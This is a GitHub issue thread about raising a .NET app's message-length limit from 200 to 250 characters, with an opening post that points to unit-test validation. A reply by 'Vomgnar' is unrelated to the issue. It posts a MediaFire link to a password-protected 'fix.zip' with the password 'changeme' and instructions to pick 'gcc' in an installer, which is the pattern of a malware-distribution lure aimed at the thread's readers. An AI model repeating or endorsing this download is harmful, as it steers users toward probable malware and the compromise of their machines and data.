### ISSUE TITLE
application should support 250 characters instead of 200

### ISSUE THREAD

**Issue by anishi1222** [anishi1222/TechExcel-Accelerate-developer-productivity-with-GitHub-Copilot-and-Dev-Box#10]
When running the .NET app, you will not be able to input more characters than the message length you set (either 200 or 250 characters). If you wish to test this, you will need to try a different route in a unit test ([hint](https://learn.microsoft.com/dotnet/api/system.componentmodel.dataannotations.validator.tryvalidateobject)). See the Advanced Challenges section for more detail.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
